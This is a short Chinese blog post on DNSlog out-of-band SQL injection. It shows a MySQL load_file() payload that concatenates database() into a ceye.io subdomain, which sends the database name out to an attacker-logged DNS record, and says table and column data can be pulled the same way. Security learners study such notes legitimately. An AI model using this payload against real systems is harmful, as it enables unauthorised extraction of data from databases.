dnslog的sql注入

前两天看到了一个骚姿势,没有回显的时候利用dnslog来得到数据库名等。
可以在一个网站上注册ceye.io,注册就可以得到一个二级域名。
用到了load_file() ,用法是load_file(文件名),比如这样:select load_file(concat(’\\\\’,database(),’.xxxx.ceye.io\\fwafw’)); 这个就相当于访问了table_schema.xxxx.ceye.io , 这个时候就会在记录上显示出来 table_schema。由于load_file()访问的是文件,所以 就要加上 \\\ ,可以在网页上试试, 它会显示的是file\\\xxxxx 。.io\\ 后面的 可以是任意的东西这里就是wafw 。然后用concat 来把 \\\database() 和 二级域名连接。
然后类似的就使用 常规的注入来得到表名,列名,数据等

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值